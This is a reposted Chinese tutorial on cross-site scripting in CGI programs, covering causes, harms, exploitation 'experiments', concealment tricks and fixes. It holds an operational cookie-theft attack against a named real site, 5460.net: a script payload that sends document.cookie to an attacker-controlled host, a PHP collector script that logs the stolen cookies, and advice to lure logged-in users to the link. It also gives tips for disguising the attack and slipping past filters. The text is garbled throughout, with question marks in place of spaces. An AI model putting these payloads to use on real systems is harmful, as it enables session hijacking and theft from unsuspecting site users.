跨站腳本執行漏洞的成因

2024-05-04 11:05:09

字體：大中小

來源：轉載

供稿：網友

本文主要介紹了跨站腳本執行漏洞的成因，由于跨站點腳本執行漏洞的信息不多，通常網絡上也沒有太詳細的介紹，希望本文能更詳細地介紹這些知識，下文是錯新技術頻道小編為您整理的跨站腳本執行漏洞的成因，一起進入下文了解一下吧！
跨站腳本執行漏洞的成因【漏洞成因】??
原因很簡單，就是因為CGI程序沒有對用戶提交的變量中的HTML代碼進行過濾或轉換。??

【漏洞形式】??
這里所說的形式，實際上是指CGI輸入的形式，主要分為兩種：??
1．顯示輸入??
2．隱式輸入??
其中顯示輸入明確要求用戶輸入數據，而隱式輸入則本來并不要求用戶輸入數據，但是用戶卻可以通?過輸入數據來進行干涉。??
顯示輸入又可以分為兩種：??
1．?輸入完成立刻輸出結果??
2．?輸入完成先存儲在文本文件或數據庫中，然后再輸出結果??
注意：后者可能會讓你的網站面目全非！：（??
而隱式輸入除了一些正常的情況外，還可以利用服務器或CGI程序處理錯誤信息的方式來實施。??

【漏洞危害】??
大家最關心的大概就要算這個問題了，下面列舉的可能并不全面，也不系統，但是我想應該是比較典?型的吧。??
1．?獲取其他用戶Cookie中的敏感數據??
2．?屏蔽頁面特定信息??
3．?偽造頁面信息??
4．?拒絕服務攻擊??
5．?突破外網內網不同安全設置??
6．?與其它漏洞結合，修改系統設置，查看系統文件，執行系統命令等??
7．?其它??
一般來說，上面的危害還經常伴隨著頁面變形的情況。而所謂跨站腳本執行漏洞，也就是通過別人的?網站達到攻擊的效果，也就是說，這種攻擊能在一定程度上隱藏身份。??

【利用方式】??
下面我們將通過具體例子來演示上面的各種危害，這樣應該更能說明問題，而且更易于理解。為了條?理更清晰一些，我們將針對每種危害做一個實驗。??
為了做好這些實驗，我們需要一個抓包軟件，我使用的是Iris，當然你可以選擇其它的軟件，比如?NetXray什么的。至于具體的使用方法，請參考相關幫助或手冊。??
另外，需要明白的一點就是：只要服務器返回用戶提交的信息，就可能存在跨站腳本執行漏洞。??
好的，一切就緒，我們開始做實驗！：）??

實驗一：獲取其他用戶Cookie中的敏感信息??
我們以國內著名的同學錄站點5460.net為例來說明一下，請按照下面的步驟進行：??
1．?進入首頁http://www.5460.net/??
2．?輸入用戶名“<h1>”，提交，發現服務器返回信息中包含了用戶提交的“<h1>”。??
3．?分析抓包數據，得到實際請求：??
http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6??
4．?構造一個提交，目標是能夠顯示用戶Cookie信息：??
http://www.5460.net/txl/login/login.pl?username=<script>alert(document.cookie)</?script>&passwd=&ok.x=28&ok.y=6??
5．?如果上面的請求獲得預期的效果，那么我們就可以嘗試下面的請求：??
http://www.5460.net/txl/login/login.pl?username=<script>window.open("http://www.notfound.org/?info.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6??
其中http://www.notfound.org/info.php是你能夠控制的某臺主機上的一個腳本，功能是獲取查詢字符串的信?息，內容如下：??
<?php??
$info?=?getenv("QUERY_STRING");??
if?($info)?{??
$fp?=?fopen("info.txt","a");??
fwrite($fp,$info."/n");??
fclose($fp);??
}??
header("Location:?http://www.5460.net");??
注：“%2B”為“+”的URL編碼，并且這里只能用“%2B”，因為“+”將被作為空格處理。后面的header語?句則純粹是為了增加隱蔽性。??
6．?如果上面的URL能夠正確運行的話，下一步就是誘使登陸5460.net的用戶訪問該URL，而我們就可以?獲取該用戶Cookie中的敏感信息。??
7．?后面要做什么就由你決定吧！??

實驗二：屏蔽頁面特定信息??
我們仍然以5460.net作為例子，下面是一個有問題的CGI程序：??
http://www.5460.net/txl/liuyan/liuyanSql.pl??
該CGI程序接受用戶提供的三個變量，即nId，csId和cName，但是沒有對用戶提交的cName變量進行任何檢?查，而且該CGI程序把cName的值作為輸出頁面的一部分，5460.net的用戶應該都比較清楚留言右下角有你?的名字，對吧？??
既然有了上面的種種條件，我們可以不妨作出下面的結論：??
某個用戶可以“屏蔽”其兩次留言之間的所有留言！??
當然，我們說的“屏蔽”不是“刪除”，用戶的留言還是存在的，只不過由于HTML的特性，我們無法從?頁面看到，當然如果你喜歡查看源代碼的話就沒有什么用處了，但是出了我們這些研究CGI安全的人來?說，有多少人有事沒事都看HTML源代碼？??
由于種種原因，我在這里就不公布具體的細節了，大家知道原理就好了。??
注：仔細想想，我們不僅能屏蔽留言，還能匿名留言，Right？??

實驗三：偽造頁面信息??
如果你理解了上面那個實驗，這個實驗就沒有必要做了，基本原理相同，只是實現起來稍微麻煩一點而?已。??

實驗四：拒絕服務攻擊??
現在應該知道，我們在某種程度上可以控制存在跨站腳本執行漏洞的服務器的行為，既然這樣，我們?就可以控制服務器進行某種消耗資源的動作。比如說運行包含死循環或打開無窮多個窗口的JavaScript腳本?等等。這樣訪問該URL的用戶系統就可能因此速度變慢甚至崩潰。同樣，我們也可能在其中嵌入一些腳?本，讓該服務器請求其它服務器上的資源，如果訪問的資源比較消耗資源，并且訪問人數比較多的話，那?么被訪問的服務器也可能被拒絕服務，而它則認為該拒絕服務攻擊是由訪問它的服務器發起的，這樣就可?以隱藏身份。??

實驗五：突破外網內網不同安全設置??
這個應該很好理解吧，一般來說我們的瀏覽器對不同的區域設置了不同的安全級別。舉例來說，對于?Internet區域，可能你不允許JavaScript執行，而在Intranet區域，你就允許JavaScript執行。一般來說，前者的?安全級別都要高于后者。這樣，一般情況下別人無法通過執行惡意JavaScript腳本對你進行攻擊，但是如果?與你處于相同內網的服務器存在跨站腳本執行漏洞，那么攻擊者就有機可乘了，因為該服務器位于Intranet?區域。??

實驗六：與其它漏洞結合，修改系統設置，查看系統文件，執行系統命令等??
由于與瀏覽器相關的漏洞太多了，所以可與跨站腳本執行漏洞一起結合的漏洞也就顯得不少。我想這?些問題大家都應該很清楚吧，前些時間的修改IE標題漏洞，錯誤MIME類型執行命令漏洞，還有多種多樣?的蠕蟲，都是很好的例子。??
更多的例子請參考下列鏈接：??
Internet?Explorer?Pop-Up?OBJECT?Tag?Bug??
http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html??
Internet?Explorer?Javascript?Modeless?Popup?Local?Denial?of?Service?Vulnerability??
http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html??
MSIE6?can?read?local?files??
http://www.xs4all.nl/~jkuperus/bug.htm??
MSIE?may?download?and?run?progams?automatically??
http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html??
File?extensions?spoofable?in?MSIE?download?dialog??
http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html??
the?other?IE?cookie?stealing?bug?(MS01-055)??
http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html??
Microsoft?Security?Bulletin?MS01-055??
http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html??
Serious?security?Flaw?in?Microsoft?Internet?Explorer?-?Zone?Spoofing??
http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html??
Incorrect?MIME?Header?Can?Cause?IE?to?Execute?E-mail?Attachment??
http://www.kriptopolis.com/cua/eml.html??

跨站腳本執行漏洞在這里的角色就是隱藏真正攻擊者的身份。??

實驗七：其它??
其實這類問題和跨站腳本執行漏洞沒有多大關系，但是在這里提一下還是很有必要的。問題的實質還?是CGI程序沒有過濾用戶提交的數據，然后進行了輸出處理。舉個例子來說，支持SSI的服務器上的CGI程?序輸出了用戶提交的數據，無論該數據是采取何種方式輸入，都可能導致SSI指令的執行。當然，這是在服?務端，而不是客戶端執行。其實像ASP，PHP和Perl等CGI語言都可能導致這種問題。??

【隱藏技巧】??
出于時間的考慮，我在這里將主要講一下理論了，相信不是很難懂，如果實在有問題，那么去找本書?看吧。??
1．?URL編碼??
比較一下：??
http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6??
http://www.5460.net/txl/login/login.pl?username=%3C%68%31%3E&passwd=&ok.x=28&ok.y＝6??
你覺得哪個更有隱蔽性？！??

2．?隱藏在其它對象之下??
與直接給別人一個鏈接相比，你是否決定把該鏈接隱藏在按鈕以下更好些呢？??

3．?嵌入頁面中??
讓別人訪問一個地址（注意這里的地址不同于上面提到的URL），是不是又要比讓別人按一個按鈕容易得?多，借助于Iframe，你可以把這種攻擊變得更隱蔽。??

4．?合理利用事件??
合理使用事件，在某些情況上可以繞過CGI程序對輸入的限制，比如說前些日子的SecurityFocus的跨站腳本?執行漏洞。??

【注意事項】??
一般情況下直接進行類似<script>alert(document.cookie)</script>之類的攻擊沒有什么問題，但是有時?CGI程序對用戶的輸入進行了一些處理，比如說包含在''或””之內，這時我們就需要使用一些小技巧?來繞過這些限制。??
如果你對HTML語言比較熟悉的話，繞過這些限制應該不成問題。??

【解決方法】??
要避免受到跨站腳本執行漏洞的攻擊，需要程序員和用戶兩方面共同努力：??
程序員：??
1．?過濾或轉換用戶提交數據中的HTML代碼??
2．?限制用戶提交數據的長度??

用戶：??
1．?不要輕易訪問別人給你的鏈接??
2．?禁止瀏覽器運行JavaScript和ActiveX代碼??

附：常見瀏覽器修改設置的位置為：??
Internet?Explorer：??
工具->Internet選項->安全->Internet->自定義級別??
工具->Internet選項->安全->Intranet->自定義級別??
Opera：??
文件->快速參數->允許使用Java??
文件->快速參數->允許使用插件??
文件->快速參數->允許使用JavaScript??

【常見問題】??
Q：跨站腳本執行漏洞在哪里存在？??
A：只要是CGI程序，只要允許用戶輸入，就可能存在跨站腳本執行漏洞。??

Q：跨站腳本執行漏洞是不是只能偷別人的Cookie？??
A：當然不是！HTML代碼能做的，跨站腳本執行漏洞基本都能做。?